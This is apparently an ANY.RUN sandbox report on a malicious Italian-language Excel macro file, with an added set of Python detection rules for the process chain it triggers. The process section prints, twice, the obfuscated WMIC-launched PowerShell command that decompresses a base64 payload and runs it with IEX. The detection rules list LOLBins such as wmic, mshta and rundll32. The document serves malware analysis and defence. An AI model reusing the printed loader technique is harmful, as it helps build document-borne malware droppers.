General Info

File name

MIL0001537426.xls

Full analysis
https://app.any.run/tasks/dcd07c36-7b14-4296-a080-058f39a7b5ec
Verdict
Malicious activity
Analysis date
9/11/2019, 09:30:47
OS:
Windows 10 Professional (build: 16299, 64 bit)
Tags:

macros

macros-on-open

maldoc-5

Indicators:

MIME:
application/vnd.ms-excel
File info:
Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Mon Sep 9 09:33:00 2019, Last Saved Time/Date: Mon Sep 9 09:37:00 2019, Security: 0
MD5

f564e32039fd930a7688a7325b3ec5fb

SHA1

2526a64145f814f8c1760a531f22de3cf8f4a4cf

SHA256

4bb516d3e5546a1ee287abe9a2b6fa3fbef3b6092a49edf13d2bb19cc1c00850

SSDEEP

1536:zP5HNfeQuP8mo1X9rlnSYYcMA+eIFAlYkRIbTkKBEqEXugsCZmbpoahZhC0cixI9:zP5HNfeQu8mo1X9rlnSYYcMA+eIFAlYu

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided as is. ANY.RUN does not guarantee the maliciousness or safety of the content.

Software environment set and analysis options

Launch configuration

Task duration
660 seconds
Additional time used
120 seconds
Fakenet option
off
Heavy Evasion option
off
MITM proxy
on
Route via Tor
off
Network geolocation
off
Privacy
Public submission
Autoconfirmation of UAC
on

Software preset

  • Internet Explorer 11.431.16299.0 KB4103768
  • Adobe Acrobat Reader DC MUI (15.007.20033)
  • CCleaner (5.35)
  • FileZilla Client 3.31.0 (3.31.0)
  • Google Chrome (73.0.3683.86)
  • Google Update Helper (1.3.33.23)
  • Java 8 Update 92 (64-bit) (8.0.920.14)
  • Java Auto Updater (2.8.92.14)
  • Microsoft Office Professional 2019 - en-us (16.0.11328.20158)
  • Microsoft Visual C++ 2017 Redistributable (x64) - 14.11.25325 (14.11.25325.0)
  • Microsoft Visual C++ 2017 Redistributable (x86) - 14.11.25325 (14.11.25325.0)
  • Microsoft Visual C++ 2017 x64 Additional Runtime - 14.11.25325 (14.11.25325)
  • Microsoft Visual C++ 2017 x64 Minimum Runtime - 14.11.25325 (14.11.25325)
  • Microsoft Visual C++ 2017 x86 Additional Runtime - 14.11.25325 (14.11.25325)
  • Microsoft Visual C++ 2017 x86 Minimum Runtime - 14.11.25325 (14.11.25325)
  • Mozilla Firefox 65.0.2 (x64 en-US) (65.0.2)
  • Notepad++ (64-bit x64) (7.5.1)
  • Office 16 Click-to-Run Extensibility Component (16.0.11328.20158)
  • Office 16 Click-to-Run Licensing Component (16.0.11328.20158)
  • Office 16 Click-to-Run Localization Component (16.0.11328.20158)
  • Opera 12.15 (12.15.1748)
  • Skype™ 7.39 (7.39.102)
  • Update for Windows 10 for x64-based Systems (KB4023057) (2.19.0.0)
  • VLC media player (2.2.6)
  • WinRAR 5.60 (64-bit) (5.60.0)
  • Windows 10 Upgrade Assistant (1.4.9200.22175)

Hotfixes

  • Client LanguagePack Package
  • Foundation Package
  • InternetExplorer Optional Package
  • KB4054022
  • KB4055237
  • KB4055994
  • KB4058043
  • KB4078408
  • KB4093110
  • KB4094276
  • KB4103729
  • KB4131372
  • KB4134661
  • LanguageFeatures Basic en us Package
  • LanguageFeatures Handwriting en us Package
  • LanguageFeatures OCR en us Package
  • LanguageFeatures Speech en us Package
  • LanguageFeatures TextToSpeech en us Package
  • MediaPlayer Package
  • Microsoft OneCore ApplicationModel Sync Desktop FOD Package
  • NetFx3 OnDemand Package
  • ProfessionalEdition
  • QuickAssist Package
  • RollupFix

Behavior activities

Loads the Task Scheduler COM API
  • mmc.exe (PID: 4756)
Loads the Task Scheduler DLL interface
  • mmc.exe (PID: 4756)
Scans artifacts that could help determine the target
  • EXCEL.EXE (PID: 2736)
  • EXCEL.EXE (PID: 5580)
Unusual execution from Microsoft Office
  • EXCEL.EXE (PID: 2736)
  • EXCEL.EXE (PID: 5580)
Reads the machine GUID from the registry
  • mmc.exe (PID: 4756)
  • cvtres.exe (PID: 3740)
  • powershell.exe (PID: 3420)
  • powershell.exe (PID: 5348)
  • powershell.exe (PID: 1924)
  • powershell.exe (PID: 3848)
  • cvtres.exe (PID: 4200)
  • powershell.exe (PID: 1084)
  • powershell.exe (PID: 2692)
  • powershell.exe (PID: 1948)
  • powershell.exe (PID: 3404)
  • powershell.exe (PID: 5396)
  • csc.exe (PID: 1580)
  • powershell.exe (PID: 580)
  • csc.exe (PID: 5724)
  • POWeRsHEll.exe (PID: 2504)
  • POWeRsHEll.exe (PID: 556)
Reads Environment values
  • powershell.exe (PID: 3420)
  • POWeRsHEll.exe (PID: 2504)
  • powershell.exe (PID: 1924)
  • powershell.exe (PID: 3848)
  • powershell.exe (PID: 580)
  • powershell.exe (PID: 5348)
  • EXCEL.EXE (PID: 2736)
  • POWeRsHEll.exe (PID: 556)
  • powershell.exe (PID: 5396)
  • powershell.exe (PID: 1948)
  • powershell.exe (PID: 2692)
  • powershell.exe (PID: 3404)
  • EXCEL.EXE (PID: 5580)
Executes PowerShell scripts
  • POWeRsHEll.exe (PID: 2504)
  • POWeRsHEll.exe (PID: 556)
PowerShell script executed
  • POWeRsHEll.exe (PID: 2504)
  • POWeRsHEll.exe (PID: 556)
Executed via WMI
  • POWeRsHEll.exe (PID: 2504)
  • POWeRsHEll.exe (PID: 556)
Application launched itself
  • POWeRsHEll.exe (PID: 2504)
  • POWeRsHEll.exe (PID: 556)
Reads mouse settings
  • EXCEL.EXE (PID: 2736)
  • EXCEL.EXE (PID: 5580)
Uses WMIC.EXE to create a new process
  • EXCEL.EXE (PID: 2736)
  • EXCEL.EXE (PID: 5580)
Manual execution by user
  • mmc.exe (PID: 4756)
  • mmc.exe (PID: 248)
  • EXCEL.EXE (PID: 2736)
Reads the software policy settings
  • powershell.exe (PID: 1924)
  • powershell.exe (PID: 3848)
  • powershell.exe (PID: 5348)
  • powershell.exe (PID: 3420)
  • powershell.exe (PID: 580)
  • EXCEL.EXE (PID: 2736)
  • POWeRsHEll.exe (PID: 2504)
  • powershell.exe (PID: 1948)
  • powershell.exe (PID: 2692)
  • powershell.exe (PID: 5396)
  • powershell.exe (PID: 1084)
  • POWeRsHEll.exe (PID: 556)
  • powershell.exe (PID: 3404)
  • EXCEL.EXE (PID: 5580)
Reads settings of System Certificates
  • powershell.exe (PID: 3420)
  • powershell.exe (PID: 3848)
  • powershell.exe (PID: 580)
  • powershell.exe (PID: 1924)
  • powershell.exe (PID: 5348)
  • EXCEL.EXE (PID: 2736)
  • POWeRsHEll.exe (PID: 2504)
  • powershell.exe (PID: 5396)
  • powershell.exe (PID: 3404)
  • powershell.exe (PID: 1084)
  • powershell.exe (PID: 2692)
  • powershell.exe (PID: 1948)
  • POWeRsHEll.exe (PID: 556)
  • EXCEL.EXE (PID: 5580)
Creates files in the user directory
  • EXCEL.EXE (PID: 2736)
  • EXCEL.EXE (PID: 5580)
Reads the machine GUID from the registry
  • EXCEL.EXE (PID: 2736)
  • EXCEL.EXE (PID: 5580)
Reads Microsoft Office registry keys
  • EXCEL.EXE (PID: 2736)
  • EXCEL.EXE (PID: 5580)

Find more information about signature artifacts and their mapping to the MITRE ATT&CK™ matrix in the full report
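
The signatures above describe one process chain: Excel runs wmic.exe with `process call create`, so the PowerShell child is created by the WMI provider host rather than by Excel (which is why the report shows no parent for PID 556 and tags it "Executed via WMI"); that PowerShell then spawns further powershell.exe children (the `-Version 5.1 -s -NoLogo -NoProfile` command line is what Start-Job background jobs look like) and csc.exe/cvtres.exe (Add-Type compiling C# on the fly). The rules below are an added example of how to express those behaviours over process-creation telemetry; they are not ANY.RUN's signatures. The events are constructed to mirror this report: PIDs and command lines come from the report where it shows them, while the WmiPrvSE.exe host process, the csc.exe/cvtres.exe arguments and the mmc.exe arguments are assumptions, and the payload text is cut to `...`.

```python
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    """One process-creation record (Sysmon event 1 / EDR telemetry shape)."""
    pid: int
    ppid: int
    image: str      # executable name as logged; case preserved on purpose
    cmdline: str


OFFICE_APPS = {"excel.exe", "winword.exe", "powerpnt.exe"}
LOLBINS = {"wmic.exe", "powershell.exe", "cmd.exe", "mshta.exe",
           "wscript.exe", "cscript.exe", "rundll32.exe"}
# -ep bypass / -ExecutionPolicy Bypass, and -w 1 / -WiN 0...01 / -WindowStyle Hidden
EP_BYPASS = re.compile(r"-e[a-z]*\s+bypass\b")
WIN_HIDDEN = re.compile(r"-w[a-z]*\s+(?:0*1|hidden)\b")

# Constructed events mirroring this report's chain (see lead-in for what is assumed).
SAMPLE_EVENTS = [
    ProcEvent(5580, 1000, "EXCEL.EXE",
              r'"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\admin\Desktop\MIL0001537426.xls"'),
    ProcEvent(5432, 5580, "wMIc.exe",
              "wMIc 'pRoCEss' 'CALL' \"cREate\" \"POWeRsHEll -NOprOf -WiN 00000000000000000000001 -EP byPass -nONiNtErac ...\""),
    ProcEvent(7000, 900, "WmiPrvSE.exe",          # assumed: WMI provider host that runs Win32_Process.Create
              r"C:\WINDOWS\system32\wbem\wmiprvse.exe -secured -Embedding"),
    ProcEvent(556, 7000, "POWeRsHEll.exe",
              "POWeRsHEll -NOprOf -WiN 00000000000000000000001 -EP byPass -nONiNtErac ..."),
    ProcEvent(1084, 556, "powershell.exe",
              r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile'),
    ProcEvent(1580, 556, "csc.exe",               # assumed arguments (Add-Type compile)
              r'"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\admin\AppData\Local\Temp\x.cmdline"'),
    ProcEvent(4200, 1580, "cvtres.exe",           # assumed arguments
              r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY"),
    ProcEvent(4756, 1000, "mmc.exe",              # assumed: analyst opening Task Scheduler, should not fire
              r'"C:\WINDOWS\system32\mmc.exe" "C:\WINDOWS\system32\taskschd.msc"'),
]


def detect(events):
    """Return (pid, rule, detail) triples for the behaviours this report flags.
    A real pipeline evaluates these per event as they arrive; here the parent
    is resolved from the in-memory list."""
    by_pid = {e.pid: e for e in events}
    findings = []
    for e in events:
        parent = by_pid.get(e.ppid)
        img = e.image.lower()
        pimg = parent.image.lower() if parent else ""
        cl = e.cmdline.lower()

        # "Uses WMIC.EXE to create a new process" / "Unusual execution from Microsoft Office"
        if pimg in OFFICE_APPS and img in LOLBINS:
            findings.append((e.pid, "office-spawns-lolbin", f"{parent.image} -> {e.image}"))

        # wmic process call create: the child is born under WmiPrvSE, not under wmic
        if img == "wmic.exe" and all(k in cl for k in ("process", "call", "create")):
            findings.append((e.pid, "wmic-process-call-create", e.cmdline[:48]))

        # "Executed via WMI": PowerShell whose parent is the WMI provider host
        if img == "powershell.exe" and pimg == "wmiprvse.exe":
            findings.append((e.pid, "powershell-under-wmiprvse", e.cmdline[:48]))

        # Hidden window plus policy bypass (-WiN 0...01 is -WindowStyle 1 = Hidden)
        if img == "powershell.exe" and EP_BYPASS.search(cl) and WIN_HIDDEN.search(cl):
            findings.append((e.pid, "powershell-hidden-bypass", e.cmdline[:48]))

        # "Application launched itself": PowerShell spawning PowerShell (Start-Job children)
        if img == "powershell.exe" and pimg == "powershell.exe":
            findings.append((e.pid, "powershell-spawns-powershell", e.cmdline[-40:]))

        # Add-Type compiling on the fly: csc.exe (then cvtres.exe) under PowerShell
        if img == "csc.exe" and pimg == "powershell.exe":
            findings.append((e.pid, "powershell-spawns-csc", e.cmdline[:48]))
    return findings


if __name__ == "__main__":
    for pid, rule, detail in detect(SAMPLE_EVENTS):
        print(f"{pid:>5}  {rule:<30} {detail}")
```

The image-name comparison is lower-cased deliberately: the sandbox logs the binary as `POWeRsHEll.exe` and `wMIc.exe`, the mixed case being part of the obfuscation, and a rule that matches `powershell.exe` case-sensitively misses both. The WmiPrvSE rule is the one that survives the broken parent chain; the Office-to-wmic rule catches the same intrusion one step earlier.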

Static information

TRiD
.xls
|   Microsoft Excel sheet (78.9%)
EXIF
FlashPix
Author:
null
LastModifiedBy:
null
Software:
Microsoft Excel
CreateDate:
2019:09:09 08:33:00
ModifyDate:
2019:09:09 08:37:00
Security:
None
CodePage:
Windows Latin 1 (Western European)
Company:
null
AppVersion:
16
ScaleCrop:
No
LinksUpToDate:
No
SharedDoc:
No
HyperlinksChanged:
No
TitleOfParts:
allegati (Italian for "attachments")
HeadingPairs
null
null
CompObjUserTypeLen:
41
CompObjUserType:
Foglio di lavoro di Microsoft Excel 2003 (Italian: "Microsoft Excel 2003 worksheet"; a localized string, which points to the file having been saved by an Italian-language Office installation)


Processes

Total processes
135
Monitored processes
36
Malicious processes
4
Suspicious processes
0

Behavior graph

Graph nodes in the order the graph lays them out, from the start node ("no specs" marks a node without indicator flags; the chain appears twice because two Excel instances, PIDs 2736 and 5580, opened the document):

excel.exe, wmic.exe (no specs), conhost.exe, powershell.exe, conhost.exe, powershell.exe, powershell.exe, conhost.exe (no specs), powershell.exe, conhost.exe (no specs), powershell.exe, conhost.exe (no specs), powershell.exe, conhost.exe (no specs), conhost.exe (no specs), csc.exe (no specs), cvtres.exe (no specs)

excel.exe, wmic.exe (no specs), conhost.exe, powershell.exe, conhost.exe, powershell.exe, powershell.exe, conhost.exe (no specs), powershell.exe, conhost.exe (no specs), conhost.exe (no specs), powershell.exe, conhost.exe (no specs), powershell.exe, conhost.exe (no specs), csc.exe (no specs), cvtres.exe (no specs)

mmc.exe (no specs), mmc.exe
Specs description
Program did not start
Integrity level elevation
Task contains an error or was rebooted
Process has crashed
Task contains several apps running
Executable file was dropped
Debug information is available
Process was injected
Network attacks were detected
Application downloaded the executable file
Actions similar to stealing personal data
Behavior similar to exploiting the vulnerability
Inspected object has suspicious PE structure
File is detected by antivirus software
CPU overrun
RAM overrun
Process starts the services
Process was added to the startup
Behavior similar to spam
Low-level access to the HDD
Probably Tor was used
System was rebooted
Connects to the network
Known threat

Process information


PID
5580
CMD
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\admin\Desktop\MIL0001537426.xls"
Path
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
Indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Microsoft Excel
Version
16.0.11328.20158
Modules
Image
c:\program files\microsoft office\root\office16\excel.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\ole32.dll
c:\program files\common files\microsoft shared\clicktorun\appvisvsubsystems64.dll
c:\windows\system32\combase.dll
c:\windows\system32\user32.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\win32u.dll
c:\program files\common files\microsoft shared\clicktorun\c2r64.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\bcryptprimitives.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\sechost.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\shell32.dll
c:\windows\system32\msvcp140.dll
c:\windows\system32\vcruntime140.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\shcore.dll
c:\windows\system32\windows.storage.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\kernel.appcore.dll
c:\windows\system32\powrprof.dll
c:\windows\system32\profapi.dll
c:\windows\system32\userenv.dll
c:\windows\system32\imm32.dll
c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\office16\mso20win32client.dll
c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\office16\mso30win32client.dll
c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\office16\mso40uiwin32client.dll
c:\windows\winsxs\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.16299.431_none_46b2c6d3edf81841\gdiplus.dll
c:\windows\system32\dwmapi.dll
c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\office16\mso50win32client.dll
c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\office16\mso98win32client.dll
c:\windows\system32\wtsapi32.dll
c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\office16\mso.dll
c:\windows\system32\version.dll
c:\windows\system32\msi.dll
c:\windows\system32\bcrypt.dll
c:\windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.16299.431_none_15c7d3ee93659e73\comctl32.dll
c:\windows\system32\d2d1.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\uxtheme.dll
c:\windows\system32\msctf.dll
c:\windows\system32\winsta.dll
c:\windows\system32\dxgi.dll
c:\windows\system32\resourcepolicyclient.dll
c:\windows\system32\d3d11.dll
c:\windows\system32\d3d10warp.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\mscoree.dll
c:\windows\microsoft.net\framework64\v4.0.30319\mscoreei.dll
c:\windows\system32\dwrite.dll
c:\windows\system32\normaliz.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\imagehlp.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\cryptbase.dll
c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\office16\riched20.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\msiso.dll
c:\windows\system32\wbem\wbemprox.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\wbemcomn.dll
c:\windows\system32\wininet.dll
c:\windows\system32\wbem\wbemsvc.dll
c:\windows\system32\wbem\fastprox.dll
c:\windows\system32\netprofm.dll
c:\windows\system32\ondemandconnroutehelper.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\nsi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\npmproxy.dll
c:\windows\system32\dhcpcsvc6.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\webio.dll
c:\windows\system32\windows.system.profile.retailinfo.dll
c:\windows\system32\xmllite.dll
c:\windows\system32\sppc.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\rasadhlp.dll
c:\windows\system32\fwpuclnt.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\schannel.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\mskeyprotect.dll
c:\windows\system32\ncrypt.dll
c:\windows\system32\ntasn1.dll
c:\windows\system32\ncryptsslp.dll
c:\windows\system32\msxml6.dll
c:\program files\microsoft office\root\office16\oart.dll
c:\windows\system32\gpapi.dll
c:\windows\system32\twinapi.appcore.dll
c:\windows\system32\rmclient.dll
c:\windows\system32\twinapi.dll
c:\windows\system32\textinputframework.dll
c:\windows\system32\coreuicomponents.dll
c:\windows\system32\coremessaging.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wintypes.dll
c:\windows\system32\cabinet.dll
c:\windows\system32\dpapi.dll
c:\program files\microsoft office\root\office16\msohev.dll
c:\windows\system32\cldapi.dll
c:\windows\system32\fltlib.dll
c:\windows\system32\aepic.dll
c:\windows\system32\propsys.dll
c:\windows\system32\mpr.dll
c:\windows\system32\windows.staterepositoryps.dll
c:\windows\system32\coml2.dll
c:\program files\microsoft office\root\office16\gkexcel.dll
c:\windows\system32\mlang.dll
c:\program files\microsoft office\root\office16\gfx.dll
c:\windows\system32\msimg32.dll
c:\program files\microsoft office\root\office16\msoarianext.dll
c:\windows\system32\slc.dll
c:\windows\system32\srpapi.dll
c:\windows\system32\windows.networking.connectivity.dll
c:\windows\system32\windows.security.authentication.onlineid.dll
c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\vba\vba7.1\vbe7.dll
c:\windows\system32\uiautomationcore.dll
c:\program files\microsoft office\root\vfs\system\msvcr100.dll
c:\windows\system32\onecoreuapcommonproxystub.dll
c:\windows\system32\sxs.dll
c:\windows\system32\dataexchange.dll
c:\windows\system32\dcomp.dll
c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\vba\vba7.1\vbeui.dll
c:\windows\system32\wintrust.dll
c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\vba\vba7.1\1033\vbe7intl.dll
c:\windows\system32\directmanipulation.dll
c:\windows\system32\d3d10_1.dll
c:\windows\system32\d3d10_1core.dll
c:\windows\system32\usp10.dll
c:\windows\system32\windows.globalization.dll
c:\windows\system32\bcp47langs.dll
c:\windows\system32\globinputhost.dll
c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\office16\msptls.dll
c:\windows\system32\windowscodecs.dll
c:\windows\system32\linkinfo.dll
c:\windows\system32\ntshrui.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\cscapi.dll
c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\vba\vba7.1\vbeuires.dll
c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\vba\vba7.1\1033\vbeuiintl.dll
c:\windows\system32\oleacc.dll
c:\program files\microsoft office\root\vfs\system\fm20.dll
c:\program files\microsoft office\root\vfs\system\fm20enu.dll
c:\program files\microsoft office\root\vfs\system\mscomctl.ocx
c:\windows\system32\comdlg32.dll
c:\windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.16299.431_none_887985224abb0026\comctl32.dll
c:\windows\system32\webservices.dll
c:\windows\system32\netutils.dll

PID
5432
CMD
wMIc 'pRoCEss' 'CALL' "cREate" "POWeRsHEll -NOprOf -WiN 00000000000000000000001 -EP byPass -nONiNtErac $K03 = [STRing][CHAr]34 ;$7HE =([CHAr]44).TOSTRinG() ;"\".(${K03}{0}{1}${K03} -f's'${7HE}'al') ('Re') (${K03}{0}{2}{1}${K03}-f'N'${7HE}'-Object'${7HE}'ew');.(${K03}{0}{1}${K03}-f 's'${7HE}'al') ('Er') (${K03}{1}{0}${K03}-f 'x'${7HE}'iE');Er(Re io.COMpResSion.DEFLATEsTREAM([sYSTEm.io.mEmORyStrEAM] [COnVeRt]::frOmBaSe64StrIng( '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' ) ${7HE} [iO.COmpREsSiON.compRESSiOnMode]::decOmprEsS)|% {Re io.STreAMrEADeR( `$_ ${7HE} [texT.ENcodInG]::utf8 ) } ).rEADtoeNd( )"\" |ieX"
Path
C:\WINDOWS\System32\Wbem\wMIc.exe
Indicators
No indicators
Parent process
EXCEL.EXE
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
WMI Commandline Utility
Version
10.0.16299.15 (WinBuild.160101.0800)
Modules
Image
c:\windows\system32\wbem\wmic.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\framedynos.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcryptprimitives.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\sechost.dll
c:\windows\system32\kernel.appcore.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\wbem\wbemprox.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\wbemcomn.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\msxml6.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\shcore.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\windows.storage.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\powrprof.dll
c:\windows\system32\profapi.dll
c:\windows\system32\imagehlp.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\imm32.dll
c:\windows\system32\ole32.dll
c:\windows\system32\msiso.dll
c:\windows\system32\uxtheme.dll
c:\windows\system32\dwmapi.dll
c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\office16\msoxmlmf.dll
c:\windows\system32\vcruntime140.dll
c:\windows\system32\wbem\wbemsvc.dll
c:\windows\system32\wbem\fastprox.dll

PID
2864
CMD
\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path
C:\WINDOWS\system32\conhost.exe
Indicators
Parent process
wMIc.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Console Window Host
Version
10.0.16299.15 (WinBuild.160101.0800)
Modules
Image
c:\windows\system32\conhost.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\conhostv2.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\combase.dll
c:\windows\system32\bcryptprimitives.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\imm32.dll
c:\windows\system32\shell32.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\shcore.dll
c:\windows\system32\windows.storage.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\kernel.appcore.dll
c:\windows\system32\powrprof.dll
c:\windows\system32\profapi.dll
c:\windows\system32\uxtheme.dll
c:\windows\system32\msctf.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\dwmapi.dll
c:\windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.16299.431_none_15c7d3ee93659e73\comctl32.dll

PID
556
CMD
POWeRsHEll -NOprOf -WiN 00000000000000000000001 -EP byPass -nONiNtErac $K03 = [STRing][CHAr]34 ;$7HE =([CHAr]44).TOSTRinG() ;"\".(${K03}{0}{1}${K03} -f's'${7HE}'al') ('Re') (${K03}{0}{2}{1}${K03}-f'N'${7HE}'-Object'${7HE}'ew');.(${K03}{0}{1}${K03}-f 's'${7HE}'al') ('Er') (${K03}{1}{0}${K03}-f 'x'${7HE}'iE');Er(Re io.COMpResSion.DEFLATEsTREAM([sYSTEm.io.mEmORyStrEAM] [COnVeRt]::frOmBaSe64StrIng( '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' ) ${7HE} [iO.COmpREsSiON.compRESSiOnMode]::decOmprEsS)|% {Re io.STreAMrEADeR( `$_ ${7HE} [texT.ENcodInG]::utf8 ) } ).rEADtoeNd( )"\" |ieX
Path
C:\WINDOWS\System32\WindowsPowerShell\v1.0\POWeRsHEll.exe
Indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Windows PowerShell
Version
10.0.16299.15 (WinBuild.160101.0800)
Modules
Image
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcryptprimitives.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\atl.dll
c:\windows\system32\sechost.dll
c:\windows\system32\user32.dll
c:\windows\system32\ole32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\imm32.dll
c:\windows\microsoft.net\framework64\v4.0.30319\mscoreei.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\kernel.appcore.dll
c:\windows\system32\version.dll
c:\windows\microsoft.net\framework64\v4.0.30319\clr.dll
c:\windows\system32\msvcr120_clr0400.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\mscorlib\ccb48f84a5cca36e9b0205b6a65ee54a\mscorlib.ni.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\cryptbase.dll
c:\windows\microsoft.net\framework64\v4.0.30319\clrjit.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system\0f4ce136d3903860dec4b2ed8baeddea\system.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.core\b1a706fe92b04f53967ea451c0424720\system.core.ni.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\psapi.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.xml\6d13a04975e2790306322d5633b19e14\system.xml.ni.dll
c:\windows\system32\shell32.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\shcore.dll
c:\windows\system32\windows.storage.dll
c:\windows\system32\powrprof.dll
c:\windows\system32\profapi.dll
c:\windows\system32\amsi.dll
c:\windows\system32\userenv.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.dired13b18a9#\7d004557bd89e0e17610f833bf4e5d8e\system.directoryservices.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.management\87bb463de6b86b3f812bfbe330f33afb\system.management.ni.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\crypt32.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.data\16770c16db8c1f805452f2841c8def08\system.data.ni.dll
c:\windows\microsoft.net\assembly\gac_64\system.data\v4.0_4.0.0.0__b77a5c561934e089\system.data.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\gpapi.dll
